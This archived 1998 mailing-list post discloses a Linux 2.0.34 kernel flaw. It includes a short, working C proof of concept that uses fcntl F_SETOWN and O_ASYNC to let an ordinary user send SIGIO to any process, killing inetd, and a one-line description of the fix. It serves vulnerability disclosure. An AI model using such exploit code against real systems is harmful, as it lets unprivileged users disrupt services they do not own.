Serious Linux 2.0.34 security problem

From: David Luyer (luyerat_private)
Date: Tue Jun 30 1998 - 00:10:47 PDT

Next message: MiG: "QPOPPER - FreBSD, BSDI/OS remote exploit"

Previous message: David Luyer: "Exmh hangs from BUGTRAQ posts [fix]"
Next in thread: Jim Bourne: "Re: Serious Linux 2.0.34 security problem"
Reply: Jim Bourne: "Re: Serious Linux 2.0.34 security problem"
Reply: Theo de Raadt: "Re: Serious Linux 2.0.34 security problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I just saw this mentioned on linux-kernel and confirmed it;

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;

  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}

This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO.  Very bad.

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.

David.

Next message: MiG: "QPOPPER - FreBSD, BSDI/OS remote exploit"
Previous message: David Luyer: "Exmh hangs from BUGTRAQ posts [fix]"
Next in thread: Jim Bourne: "Re: Serious Linux 2.0.34 security problem"
Reply: Jim Bourne: "Re: Serious Linux 2.0.34 security problem"
Reply: Theo de Raadt: "Re: Serious Linux 2.0.34 security problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:00:56 PDT